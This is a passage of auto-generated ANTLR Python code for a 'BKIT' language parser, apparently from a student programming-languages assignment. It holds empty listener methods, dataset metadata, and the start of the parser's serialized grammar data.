ctx:BKITParser.Break_stmtContext):\n pass\n\n # Exit a parse tree produced by BKITParser#break_stmt.\n def exitBreak_stmt(self, ctx:BKITParser.Break_stmtContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#continue_stmt.\n def enterContinue_stmt(self, ctx:BKITParser.Continue_stmtContext):\n pass\n\n # Exit a parse tree produced by BKITParser#continue_stmt.\n def exitContinue_stmt(self, ctx:BKITParser.Continue_stmtContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#call_stmt.\n def enterCall_stmt(self, ctx:BKITParser.Call_stmtContext):\n pass\n\n # Exit a parse tree produced by BKITParser#call_stmt.\n def exitCall_stmt(self, ctx:BKITParser.Call_stmtContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#return_stmt.\n def enterReturn_stmt(self, ctx:BKITParser.Return_stmtContext):\n pass\n\n # Exit a parse tree produced by BKITParser#return_stmt.\n def exitReturn_stmt(self, ctx:BKITParser.Return_stmtContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#expr.\n def enterExpr(self, ctx:BKITParser.ExprContext):\n pass\n\n # Exit a parse tree produced by BKITParser#expr.\n def exitExpr(self, ctx:BKITParser.ExprContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#expr1.\n def enterExpr1(self, ctx:BKITParser.Expr1Context):\n pass\n\n # Exit a parse tree produced by BKITParser#expr1.\n def exitExpr1(self, ctx:BKITParser.Expr1Context):\n pass\n\n\n # Enter a parse tree produced by BKITParser#expr2.\n def enterExpr2(self, ctx:BKITParser.Expr2Context):\n pass\n\n # Exit a parse tree produced by BKITParser#expr2.\n def exitExpr2(self, ctx:BKITParser.Expr2Context):\n pass\n\n\n # Enter a parse tree produced by BKITParser#expr3.\n def enterExpr3(self, ctx:BKITParser.Expr3Context):\n pass\n\n # Exit a parse tree produced by BKITParser#expr3.\n def exitExpr3(self, ctx:BKITParser.Expr3Context):\n pass\n\n\n # Enter a parse tree produced by BKITParser#expr4.\n def enterExpr4(self, ctx:BKITParser.Expr4Context):\n pass\n\n # Exit a parse tree produced by BKITParser#expr4.\n def exitExpr4(self, ctx:BKITParser.Expr4Context):\n pass\n\n\n # Enter a parse tree produced by BKITParser#expr5.\n def enterExpr5(self, ctx:BKITParser.Expr5Context):\n pass\n\n # Exit a parse tree produced by BKITParser#expr5.\n def exitExpr5(self, ctx:BKITParser.Expr5Context):\n pass\n\n\n # Enter a parse tree produced by BKITParser#expr6.\n def enterExpr6(self, ctx:BKITParser.Expr6Context):\n pass\n\n # Exit a parse tree produced by BKITParser#expr6.\n def exitExpr6(self, ctx:BKITParser.Expr6Context):\n pass\n\n\n # Enter a parse tree produced by BKITParser#array_cell.\n def enterArray_cell(self, ctx:BKITParser.Array_cellContext):\n pass\n\n # Exit a parse tree produced by BKITParser#array_cell.\n def exitArray_cell(self, ctx:BKITParser.Array_cellContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#expr7.\n def enterExpr7(self, ctx:BKITParser.Expr7Context):\n pass\n\n # Exit a parse tree produced by BKITParser#expr7.\n def exitExpr7(self, ctx:BKITParser.Expr7Context):\n pass\n\n\n # Enter a parse tree produced by BKITParser#expr8.\n def enterExpr8(self, ctx:BKITParser.Expr8Context):\n pass\n\n # Exit a parse tree produced by BKITParser#expr8.\n def exitExpr8(self, ctx:BKITParser.Expr8Context):\n pass\n\n\n # Enter a parse tree produced by BKITParser#operand.\n def enterOperand(self, ctx:BKITParser.OperandContext):\n pass\n\n # Exit a parse tree produced by BKITParser#operand.\n def exitOperand(self, ctx:BKITParser.OperandContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#function_call.\n def enterFunction_call(self, ctx:BKITParser.Function_callContext):\n pass\n\n # Exit a parse tree produced by BKITParser#function_call.\n def exitFunction_call(self, ctx:BKITParser.Function_callContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#index_op.\n def enterIndex_op(self, ctx:BKITParser.Index_opContext):\n pass\n\n # Exit a parse tree produced by BKITParser#index_op.\n def exitIndex_op(self, ctx:BKITParser.Index_opContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#array.\n def enterArray(self, ctx:BKITParser.ArrayContext):\n pass\n\n # Exit a parse tree produced by BKITParser#array.\n def exitArray(self, ctx:BKITParser.ArrayContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#primitive_data.\n def enterPrimitive_data(self, ctx:BKITParser.Primitive_dataContext):\n pass\n\n # Exit a parse tree produced by BKITParser#primitive_data.\n def exitPrimitive_data(self, ctx:BKITParser.Primitive_dataContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#array_lit.\n def enterArray_lit(self, ctx:BKITParser.Array_litContext):\n pass\n\n # Exit a parse tree produced by BKITParser#array_lit.\n def exitArray_lit(self, ctx:BKITParser.Array_litContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#var_list.\n def enterVar_list(self, ctx:BKITParser.Var_listContext):\n pass\n\n # Exit a parse tree produced by BKITParser#var_list.\n def exitVar_list(self, ctx:BKITParser.Var_listContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#var_init.\n def enterVar_init(self, ctx:BKITParser.Var_initContext):\n pass\n\n # Exit a parse tree produced by BKITParser#var_init.\n def exitVar_init(self, ctx:BKITParser.Var_initContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#var_non_init.\n def enterVar_non_init(self, ctx:BKITParser.Var_non_initContext):\n pass\n\n # Exit a parse tree produced by BKITParser#var_non_init.\n def exitVar_non_init(self, ctx:BKITParser.Var_non_initContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#composite_var.\n def enterComposite_var(self, ctx:BKITParser.Composite_varContext):\n pass\n\n # Exit a parse tree produced by BKITParser#composite_var.\n def exitComposite_var(self, ctx:BKITParser.Composite_varContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#composite_init.\n def enterComposite_init(self, ctx:BKITParser.Composite_initContext):\n pass\n\n # Exit a parse tree produced by BKITParser#composite_init.\n def exitComposite_init(self, ctx:BKITParser.Composite_initContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#primitive_init.\n def enterPrimitive_init(self, ctx:BKITParser.Primitive_initContext):\n pass\n\n # Exit a parse tree produced by BKITParser#primitive_init.\n def exitPrimitive_init(self, ctx:BKITParser.Primitive_initContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#params_list.\n def enterParams_list(self, ctx:BKITParser.Params_listContext):\n pass\n\n # Exit a parse tree produced by BKITParser#params_list.\n def exitParams_list(self, ctx:BKITParser.Params_listContext):\n pass\n\n\n\ndel BKITParser" }, { "alpha_fraction": 0.4811396300792694, "alphanum_fraction": 0.5494943857192993, "avg_line_length": 33.6207389831543, "blob_id": "3cdcf1175436ce25d1a2e3acce3316222cfcf199", "content_id": "0827cad5a7649ddd687b2bef79b2c3c4d0ca5744", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 97506, "license_type": "no_license", "max_line_length": 328, "num_lines": 2816, "path": "/Assignments/assignment2/src1.0/main/bkit/parser/.antlr/BKITParser.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from /home/nguyendat/Documents/projects/PPL/Assignments/assignment2/src/main/bkit/parser/BKIT.g4 by ANTLR 4.8\n# encoding: utf-8\nfrom antlr4 import *\nfrom io import StringIO\nimport sys\nif sys.version_info[1] > 5:\n\tfrom typing import TextIO\nelse:\n\tfrom typing.io import TextIO\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\3S\")\n buf.write(\"\\u01a3\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\\t\\7\")\n buf.write(\"\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\\4\\16\")\n buf.write(\"\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\4\\23\\t\\23\")\n buf.write(\"\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\\4\\31\")\n buf.write(\"\\t\\31\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\\t\\36\")\n buf.write(\"\\4\\37\\t\\37\\4 \\t \\4!\\t!\\4\\\"\\t\\\"\\4#\\t#\\4$\\t$\\4%\\t%\\4&\\t\")\n buf.write(\"&\\3\\2\\3\\2\\3\\2\\7\\2P\\n\\2\\f\\2\\16\\2S\\13\\2\\3\\2\\7\\2V\\n\\2\\f\\2\")\n buf.write(\"\\16\\2Y\\13\\2\\3\\2\\3\\2\\3\\3\\3\\3\\3\\3\\3\\3\\3\\4\\3\\4\\3\\4\\3\\4\\3\")\n buf.write(\"\\4\\3\\4\\5\\4g\\n\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\4\\7\\4n\\n\\4\\f\\4\\16\\4\")\n buf.write(\"q\\13\\4\\3\\4\\7\\4t\\n\\4\\f\\4\\16\\4w\\13\\4\\3\\4\\3\\4\\3\\4\\3\\5\\3\\5\")\n buf.write(\"\\3\\5\\3\\5\\3\\6\\3\\6\\3\\7\\3\\7\\3\\7\\5\\7\\u0085\\n\\7\\3\\7\\3\\7\\3\\7\")\n buf.write(\"\\5\\7\\u008a\\n\\7\\7\\7\\u008c\\n\\7\\f\\7\\16\\7\\u008f\\13\\7\\5\\7\\u0091\")\n buf.write(\"\\n\\7\\3\\7\\3\\7\\3\\b\\3\\b\\5\\b\\u0097\\n\\b\\3\\b\\3\\b\\3\\b\\5\\b\\u009c\")\n buf.write(\"\\n\\b\\7\\b\\u009e\\n\\b\\f\\b\\16\\b\\u00a1\\13\\b\\3\\t\\3\\t\\3\\t\\3\\t\")\n buf.write(\"\\6\\t\\u00a7\\n\\t\\r\\t\\16\\t\\u00a8\\3\\t\\5\\t\\u00ac\\n\\t\\3\\n\\3\")\n buf.write(\"\\n\\3\\n\\3\\n\\3\\n\\6\\n\\u00b3\\n\\n\\r\\n\\16\\n\\u00b4\\3\\13\\3\\13\")\n buf.write(\"\\3\\13\\3\\13\\6\\13\\u00bb\\n\\13\\r\\13\\16\\13\\u00bc\\3\\13\\5\\13\")\n buf.write(\"\\u00c0\\n\\13\\3\\13\\3\\13\\3\\13\\5\\13\\u00c5\\n\\13\\3\\f\\3\\f\\3\\f\")\n buf.write(\"\\3\\f\\3\\r\\3\\r\\3\\r\\3\\r\\3\\16\\3\\16\\3\\16\\7\\16\\u00d2\\n\\16\\f\")\n buf.write(\"\\16\\16\\16\\u00d5\\13\\16\\3\\17\\3\\17\\3\\17\\7\\17\\u00da\\n\\17\\f\")\n buf.write(\"\\17\\16\\17\\u00dd\\13\\17\\3\\17\\7\\17\\u00e0\\n\\17\\f\\17\\16\\17\")\n buf.write(\"\\u00e3\\13\\17\\3\\20\\3\\20\\3\\20\\3\\20\\3\\20\\3\\20\\3\\20\\3\\20\\3\")\n buf.write(\"\\20\\3\\20\\3\\20\\3\\20\\3\\20\\3\\20\\3\\20\\3\\20\\3\\20\\3\\20\\3\\20\")\n buf.write(\"\\5\\20\\u00f8\\n\\20\\3\\21\\3\\21\\3\\21\\3\\21\\3\\21\\3\\21\\3\\21\\3\")\n buf.write(\"\\21\\3\\21\\7\\21\\u0103\\n\\21\\f\\21\\16\\21\\u0106\\13\\21\\3\\21\\3\")\n buf.write(\"\\21\\5\\21\\u010a\\n\\21\\3\\21\\3\\21\\3\\21\\3\\22\\3\\22\\3\\23\\3\\23\")\n buf.write(\"\\3\\23\\3\\23\\3\\23\\3\\23\\3\\23\\3\\23\\3\\23\\3\\23\\3\\23\\3\\23\\3\\23\")\n buf.write(\"\\3\\23\\3\\23\\3\\24\\3\\24\\3\\24\\3\\24\\3\\24\\3\\24\\3\\24\\3\\25\\3\\25\")\n buf.write(\"\\3\\25\\3\\25\\3\\25\\3\\25\\3\\25\\3\\26\\3\\26\\5\\26\\u0130\\n\\26\\3\")\n buf.write(\"\\26\\3\\26\\3\\26\\3\\27\\3\\27\\3\\30\\3\\30\\3\\31\\3\\31\\3\\32\\3\\32\")\n buf.write(\"\\5\\32\\u013d\\n\\32\\3\\33\\3\\33\\3\\33\\3\\33\\3\\33\\5\\33\\u0144\\n\")\n buf.write(\"\\33\\3\\34\\3\\34\\3\\34\\3\\34\\3\\34\\3\\34\\7\\34\\u014c\\n\\34\\f\\34\")\n buf.write(\"\\16\\34\\u014f\\13\\34\\3\\35\\3\\35\\3\\35\\3\\35\\3\\35\\3\\35\\7\\35\")\n buf.write(\"\\u0157\\n\\35\\f\\35\\16\\35\\u015a\\13\\35\\3\\36\\3\\36\\3\\36\\3\\36\")\n buf.write(\"\\3\\36\\3\\36\\7\\36\\u0162\\n\\36\\f\\36\\16\\36\\u0165\\13\\36\\3\\37\")\n buf.write(\"\\3\\37\\3\\37\\5\\37\\u016a\\n\\37\\3 \\3 \\3 \\5 \\u016f\\n \\3!\\3!\")\n buf.write(\"\\3!\\3!\\5!\\u0175\\n!\\3\\\"\\3\\\"\\5\\\"\\u0179\\n\\\"\\3#\\3#\\3#\\3#\\3\")\n buf.write(\"#\\5#\\u0180\\n#\\3$\\3$\\3$\\5$\\u0185\\n$\\3%\\3%\\3%\\3%\\3%\\7%\\u018c\")\n buf.write(\"\\n%\\f%\\16%\\u018f\\13%\\7%\\u0191\\n%\\f%\\16%\\u0194\\13%\\3%\\3\")\n buf.write(\"%\\3&\\3&\\3&\\3&\\3&\\3&\\3&\\3&\\3&\\5&\\u01a1\\n&\\3&\\2\\5\\668:\\'\")\n buf.write(\"\\2\\4\\6\\b\\n\\f\\16\\20\\22\\24\\26\\30\\32\\34\\36 \\\"$&(*,.\\60\\62\")\n buf.write(\"\\64\\668:<>@BDFHJ\\2\\3\\3\\2\\n\\r\\2\\u01ac\\2Q\\3\\2\\2\\2\\4\\\\\\3\")\n buf.write(\"\\2\\2\\2\\6`\\3\\2\\2\\2\\b{\\3\\2\\2\\2\\n\\177\\3\\2\\2\\2\\f\\u0081\\3\\2\")\n buf.write(\"\\2\\2\\16\\u0096\\3\\2\\2\\2\\20\\u00ab\\3\\2\\2\\2\\22\\u00ad\\3\\2\\2\")\n buf.write(\"\\2\\24\\u00bf\\3\\2\\2\\2\\26\\u00c6\\3\\2\\2\\2\\30\\u00ca\\3\\2\\2\\2\")\n buf.write(\"\\32\\u00ce\\3\\2\\2\\2\\34\\u00db\\3\\2\\2\\2\\36\\u00f7\\3\\2\\2\\2 \\u00f9\")\n buf.write(\"\\3\\2\\2\\2\\\"\\u010e\\3\\2\\2\\2$\\u0110\\3\\2\\2\\2&\\u011f\\3\\2\\2\\2\")\n buf.write(\"(\\u0126\\3\\2\\2\\2*\\u012f\\3\\2\\2\\2,\\u0134\\3\\2\\2\\2.\\u0136\\3\")\n buf.write(\"\\2\\2\\2\\60\\u0138\\3\\2\\2\\2\\62\\u013a\\3\\2\\2\\2\\64\\u0143\\3\\2\")\n buf.write(\"\\2\\2\\66\\u0145\\3\\2\\2\\28\\u0150\\3\\2\\2\\2:\\u015b\\3\\2\\2\\2<\\u0169\")\n buf.write(\"\\3\\2\\2\\2>\\u016e\\3\\2\\2\\2@\\u0174\\3\\2\\2\\2B\\u0178\\3\\2\\2\\2\")\n buf.write(\"D\\u017f\\3\\2\\2\\2F\\u0184\\3\\2\\2\\2H\\u0186\\3\\2\\2\\2J\\u01a0\\3\")\n buf.write(\"\\2\\2\\2LM\\5\\4\\3\\2MN\\7B\\2\\2NP\\3\\2\\2\\2OL\\3\\2\\2\\2PS\\3\\2\\2\")\n buf.write(\"\\2QO\\3\\2\\2\\2QR\\3\\2\\2\\2RW\\3\\2\\2\\2SQ\\3\\2\\2\\2TV\\5\\6\\4\\2U\")\n buf.write(\"T\\3\\2\\2\\2VY\\3\\2\\2\\2WU\\3\\2\\2\\2WX\\3\\2\\2\\2XZ\\3\\2\\2\\2YW\\3\")\n buf.write(\"\\2\\2\\2Z[\\7\\2\\2\\3[\\3\\3\\2\\2\\2\\\\]\\7\\36\\2\\2]^\\7@\\2\\2^_\\5\\16\")\n buf.write(\"\\b\\2_\\5\\3\\2\\2\\2`a\\7\\31\\2\\2ab\\7@\\2\\2bf\\7\\3\\2\\2cd\\7\\33\\2\")\n buf.write(\"\\2de\\7@\\2\\2eg\\5\\32\\16\\2fc\\3\\2\\2\\2fg\\3\\2\\2\\2gh\\3\\2\\2\\2\")\n buf.write(\"hi\\7\\16\\2\\2io\\7@\\2\\2jk\\5\\\"\\22\\2kl\\7B\\2\\2ln\\3\\2\\2\\2mj\\3\")\n buf.write(\"\\2\\2\\2nq\\3\\2\\2\\2om\\3\\2\\2\\2op\\3\\2\\2\\2pu\\3\\2\\2\\2qo\\3\\2\\2\")\n buf.write(\"\\2rt\\5\\36\\20\\2sr\\3\\2\\2\\2tw\\3\\2\\2\\2us\\3\\2\\2\\2uv\\3\\2\\2\\2\")\n buf.write(\"vx\\3\\2\\2\\2wu\\3\\2\\2\\2xy\\7\\25\\2\\2yz\\7A\\2\\2z\\7\\3\\2\\2\\2{|\")\n buf.write(\"\\7\\3\\2\\2|}\\7D\\2\\2}~\\5\\f\\7\\2~\\t\\3\\2\\2\\2\\177\\u0080\\t\\2\\2\")\n buf.write(\"\\2\\u0080\\13\\3\\2\\2\\2\\u0081\\u0090\\7>\\2\\2\\u0082\\u0085\\5\\n\")\n buf.write(\"\\6\\2\\u0083\\u0085\\5\\f\\7\\2\\u0084\\u0082\\3\\2\\2\\2\\u0084\\u0083\")\n buf.write(\"\\3\\2\\2\\2\\u0085\\u008d\\3\\2\\2\\2\\u0086\\u0089\\7C\\2\\2\\u0087\")\n buf.write(\"\\u008a\\5\\n\\6\\2\\u0088\\u008a\\5\\f\\7\\2\\u0089\\u0087\\3\\2\\2\\2\")\n buf.write(\"\\u0089\\u0088\\3\\2\\2\\2\\u008a\\u008c\\3\\2\\2\\2\\u008b\\u0086\\3\")\n buf.write(\"\\2\\2\\2\\u008c\\u008f\\3\\2\\2\\2\\u008d\\u008b\\3\\2\\2\\2\\u008d\\u008e\")\n buf.write(\"\\3\\2\\2\\2\\u008e\\u0091\\3\\2\\2\\2\\u008f\\u008d\\3\\2\\2\\2\\u0090\")\n buf.write(\"\\u0084\\3\\2\\2\\2\\u0090\\u0091\\3\\2\\2\\2\\u0091\\u0092\\3\\2\\2\\2\")\n buf.write(\"\\u0092\\u0093\\7?\\2\\2\\u0093\\r\\3\\2\\2\\2\\u0094\\u0097\\5\\20\\t\")\n buf.write(\"\\2\\u0095\\u0097\\5\\24\\13\\2\\u0096\\u0094\\3\\2\\2\\2\\u0096\\u0095\")\n buf.write(\"\\3\\2\\2\\2\\u0097\\u009f\\3\\2\\2\\2\\u0098\\u009b\\7C\\2\\2\\u0099\")\n buf.write(\"\\u009c\\5\\20\\t\\2\\u009a\\u009c\\5\\24\\13\\2\\u009b\\u0099\\3\\2\")\n buf.write(\"\\2\\2\\u009b\\u009a\\3\\2\\2\\2\\u009c\\u009e\\3\\2\\2\\2\\u009d\\u0098\")\n buf.write(\"\\3\\2\\2\\2\\u009e\\u00a1\\3\\2\\2\\2\\u009f\\u009d\\3\\2\\2\\2\\u009f\")\n buf.write(\"\\u00a0\\3\\2\\2\\2\\u00a0\\17\\3\\2\\2\\2\\u00a1\\u009f\\3\\2\\2\\2\\u00a2\")\n buf.write(\"\\u00a6\\7\\3\\2\\2\\u00a3\\u00a4\\7<\\2\\2\\u00a4\\u00a5\\7\\n\\2\\2\")\n buf.write(\"\\u00a5\\u00a7\\7=\\2\\2\\u00a6\\u00a3\\3\\2\\2\\2\\u00a7\\u00a8\\3\")\n buf.write(\"\\2\\2\\2\\u00a8\\u00a6\\3\\2\\2\\2\\u00a8\\u00a9\\3\\2\\2\\2\\u00a9\\u00ac\")\n buf.write(\"\\3\\2\\2\\2\\u00aa\\u00ac\\7\\3\\2\\2\\u00ab\\u00a2\\3\\2\\2\\2\\u00ab\")\n buf.write(\"\\u00aa\\3\\2\\2\\2\\u00ac\\21\\3\\2\\2\\2\\u00ad\\u00b2\\7\\3\\2\\2\\u00ae\")\n buf.write(\"\\u00af\\7<\\2\\2\\u00af\\u00b0\\5\\64\\33\\2\\u00b0\\u00b1\\7=\\2\\2\")\n buf.write(\"\\u00b1\\u00b3\\3\\2\\2\\2\\u00b2\\u00ae\\3\\2\\2\\2\\u00b3\\u00b4\\3\")\n buf.write(\"\\2\\2\\2\\u00b4\\u00b2\\3\\2\\2\\2\\u00b4\\u00b5\\3\\2\\2\\2\\u00b5\\23\")\n buf.write(\"\\3\\2\\2\\2\\u00b6\\u00ba\\7\\3\\2\\2\\u00b7\\u00b8\\7<\\2\\2\\u00b8\")\n buf.write(\"\\u00b9\\7\\n\\2\\2\\u00b9\\u00bb\\7=\\2\\2\\u00ba\\u00b7\\3\\2\\2\\2\")\n buf.write(\"\\u00bb\\u00bc\\3\\2\\2\\2\\u00bc\\u00ba\\3\\2\\2\\2\\u00bc\\u00bd\\3\")\n buf.write(\"\\2\\2\\2\\u00bd\\u00c0\\3\\2\\2\\2\\u00be\\u00c0\\7\\3\\2\\2\\u00bf\\u00b6\")\n buf.write(\"\\3\\2\\2\\2\\u00bf\\u00be\\3\\2\\2\\2\\u00c0\\u00c1\\3\\2\\2\\2\\u00c1\")\n buf.write(\"\\u00c4\\7D\\2\\2\\u00c2\\u00c5\\5\\f\\7\\2\\u00c3\\u00c5\\5\\n\\6\\2\")\n buf.write(\"\\u00c4\\u00c2\\3\\2\\2\\2\\u00c4\\u00c3\\3\\2\\2\\2\\u00c5\\25\\3\\2\")\n buf.write(\"\\2\\2\\u00c6\\u00c7\\5\\22\\n\\2\\u00c7\\u00c8\\7D\\2\\2\\u00c8\\u00c9\")\n buf.write(\"\\5\\f\\7\\2\\u00c9\\27\\3\\2\\2\\2\\u00ca\\u00cb\\7\\3\\2\\2\\u00cb\\u00cc\")\n buf.write(\"\\7D\\2\\2\\u00cc\\u00cd\\5\\n\\6\\2\\u00cd\\31\\3\\2\\2\\2\\u00ce\\u00d3\")\n buf.write(\"\\5\\20\\t\\2\\u00cf\\u00d0\\7C\\2\\2\\u00d0\\u00d2\\5\\20\\t\\2\\u00d1\")\n buf.write(\"\\u00cf\\3\\2\\2\\2\\u00d2\\u00d5\\3\\2\\2\\2\\u00d3\\u00d1\\3\\2\\2\\2\")\n buf.write(\"\\u00d3\\u00d4\\3\\2\\2\\2\\u00d4\\33\\3\\2\\2\\2\\u00d5\\u00d3\\3\\2\")\n buf.write(\"\\2\\2\\u00d6\\u00d7\\5\\\"\\22\\2\\u00d7\\u00d8\\7B\\2\\2\\u00d8\\u00da\")\n buf.write(\"\\3\\2\\2\\2\\u00d9\\u00d6\\3\\2\\2\\2\\u00da\\u00dd\\3\\2\\2\\2\\u00db\")\n buf.write(\"\\u00d9\\3\\2\\2\\2\\u00db\\u00dc\\3\\2\\2\\2\\u00dc\\u00e1\\3\\2\\2\\2\")\n buf.write(\"\\u00dd\\u00db\\3\\2\\2\\2\\u00de\\u00e0\\5\\36\\20\\2\\u00df\\u00de\")\n buf.write(\"\\3\\2\\2\\2\\u00e0\\u00e3\\3\\2\\2\\2\\u00e1\\u00df\\3\\2\\2\\2\\u00e1\")\n buf.write(\"\\u00e2\\3\\2\\2\\2\\u00e2\\35\\3\\2\\2\\2\\u00e3\\u00e1\\3\\2\\2\\2\\u00e4\")\n buf.write(\"\\u00f8\\5 \\21\\2\\u00e5\\u00f8\\5$\\23\\2\\u00e6\\u00f8\\5&\\24\\2\")\n buf.write(\"\\u00e7\\u00f8\\5(\\25\\2\\u00e8\\u00e9\\5*\\26\\2\\u00e9\\u00ea\\7\")\n buf.write(\"B\\2\\2\\u00ea\\u00f8\\3\\2\\2\\2\\u00eb\\u00ec\\5,\\27\\2\\u00ec\\u00ed\")\n buf.write(\"\\7B\\2\\2\\u00ed\\u00f8\\3\\2\\2\\2\\u00ee\\u00ef\\5.\\30\\2\\u00ef\")\n buf.write(\"\\u00f0\\7B\\2\\2\\u00f0\\u00f8\\3\\2\\2\\2\\u00f1\\u00f2\\5\\60\\31\")\n buf.write(\"\\2\\u00f2\\u00f3\\7B\\2\\2\\u00f3\\u00f8\\3\\2\\2\\2\\u00f4\\u00f5\")\n buf.write(\"\\5\\62\\32\\2\\u00f5\\u00f6\\7B\\2\\2\\u00f6\\u00f8\\3\\2\\2\\2\\u00f7\")\n buf.write(\"\\u00e4\\3\\2\\2\\2\\u00f7\\u00e5\\3\\2\\2\\2\\u00f7\\u00e6\\3\\2\\2\\2\")\n buf.write(\"\\u00f7\\u00e7\\3\\2\\2\\2\\u00f7\\u00e8\\3\\2\\2\\2\\u00f7\\u00eb\\3\")\n buf.write(\"\\2\\2\\2\\u00f7\\u00ee\\3\\2\\2\\2\\u00f7\\u00f1\\3\\2\\2\\2\\u00f7\\u00f4\")\n buf.write(\"\\3\\2\\2\\2\\u00f8\\37\\3\\2\\2\\2\\u00f9\\u00fa\\7\\32\\2\\2\\u00fa\\u00fb\")\n buf.write(\"\\5\\64\\33\\2\\u00fb\\u00fc\\7\\35\\2\\2\\u00fc\\u0104\\5\\34\\17\\2\")\n buf.write(\"\\u00fd\\u00fe\\7\\23\\2\\2\\u00fe\\u00ff\\5\\64\\33\\2\\u00ff\\u0100\")\n buf.write(\"\\7\\35\\2\\2\\u0100\\u0101\\5\\34\\17\\2\\u0101\\u0103\\3\\2\\2\\2\\u0102\")\n buf.write(\"\\u00fd\\3\\2\\2\\2\\u0103\\u0106\\3\\2\\2\\2\\u0104\\u0102\\3\\2\\2\\2\")\n buf.write(\"\\u0104\\u0105\\3\\2\\2\\2\\u0105\\u0109\\3\\2\\2\\2\\u0106\\u0104\\3\")\n buf.write(\"\\2\\2\\2\\u0107\\u0108\\7\\22\\2\\2\\u0108\\u010a\\5\\34\\17\\2\\u0109\")\n buf.write(\"\\u0107\\3\\2\\2\\2\\u0109\\u010a\\3\\2\\2\\2\\u010a\\u010b\\3\\2\\2\\2\")\n buf.write(\"\\u010b\\u010c\\7\\24\\2\\2\\u010c\\u010d\\7A\\2\\2\\u010d!\\3\\2\\2\")\n buf.write(\"\\2\\u010e\\u010f\\5\\4\\3\\2\\u010f#\\3\\2\\2\\2\\u0110\\u0111\\7\\30\")\n buf.write(\"\\2\\2\\u0111\\u0112\\7:\\2\\2\\u0112\\u0113\\7\\3\\2\\2\\u0113\\u0114\")\n buf.write(\"\\7D\\2\\2\\u0114\\u0115\\5\\64\\33\\2\\u0115\\u0116\\7C\\2\\2\\u0116\")\n buf.write(\"\\u0117\\5\\64\\33\\2\\u0117\\u0118\\7C\\2\\2\\u0118\\u0119\\5\\64\\33\")\n buf.write(\"\\2\\u0119\\u011a\\7;\\2\\2\\u011a\\u011b\\7\\21\\2\\2\\u011b\\u011c\")\n buf.write(\"\\5\\34\\17\\2\\u011c\\u011d\\7\\26\\2\\2\\u011d\\u011e\\7A\\2\\2\\u011e\")\n buf.write(\"%\\3\\2\\2\\2\\u011f\\u0120\\7\\37\\2\\2\\u0120\\u0121\\5\\64\\33\\2\\u0121\")\n buf.write(\"\\u0122\\7\\21\\2\\2\\u0122\\u0123\\5\\34\\17\\2\\u0123\\u0124\\7\\27\")\n buf.write(\"\\2\\2\\u0124\\u0125\\7A\\2\\2\\u0125\\'\\3\\2\\2\\2\\u0126\\u0127\\7\")\n buf.write(\"\\21\\2\\2\\u0127\\u0128\\5\\34\\17\\2\\u0128\\u0129\\7\\37\\2\\2\\u0129\")\n buf.write(\"\\u012a\\5\\64\\33\\2\\u012a\\u012b\\7\\\"\\2\\2\\u012b\\u012c\\7A\\2\")\n buf.write(\"\\2\\u012c)\\3\\2\\2\\2\\u012d\\u0130\\5\\22\\n\\2\\u012e\\u0130\\7\\3\")\n buf.write(\"\\2\\2\\u012f\\u012d\\3\\2\\2\\2\\u012f\\u012e\\3\\2\\2\\2\\u0130\\u0131\")\n buf.write(\"\\3\\2\\2\\2\\u0131\\u0132\\7D\\2\\2\\u0132\\u0133\\5\\64\\33\\2\\u0133\")\n buf.write(\"+\\3\\2\\2\\2\\u0134\\u0135\\7\\17\\2\\2\\u0135-\\3\\2\\2\\2\\u0136\\u0137\")\n buf.write(\"\\7\\20\\2\\2\\u0137/\\3\\2\\2\\2\\u0138\\u0139\\5H%\\2\\u0139\\61\\3\")\n buf.write(\"\\2\\2\\2\\u013a\\u013c\\7\\34\\2\\2\\u013b\\u013d\\5\\64\\33\\2\\u013c\")\n buf.write(\"\\u013b\\3\\2\\2\\2\\u013c\\u013d\\3\\2\\2\\2\\u013d\\63\\3\\2\\2\\2\\u013e\")\n buf.write(\"\\u013f\\5\\66\\34\\2\\u013f\\u0140\\7\\4\\2\\2\\u0140\\u0141\\5\\66\")\n buf.write(\"\\34\\2\\u0141\\u0144\\3\\2\\2\\2\\u0142\\u0144\\5\\66\\34\\2\\u0143\")\n buf.write(\"\\u013e\\3\\2\\2\\2\\u0143\\u0142\\3\\2\\2\\2\\u0144\\65\\3\\2\\2\\2\\u0145\")\n buf.write(\"\\u0146\\b\\34\\1\\2\\u0146\\u0147\\58\\35\\2\\u0147\\u014d\\3\\2\\2\")\n buf.write(\"\\2\\u0148\\u0149\\f\\4\\2\\2\\u0149\\u014a\\7\\5\\2\\2\\u014a\\u014c\")\n buf.write(\"\\58\\35\\2\\u014b\\u0148\\3\\2\\2\\2\\u014c\\u014f\\3\\2\\2\\2\\u014d\")\n 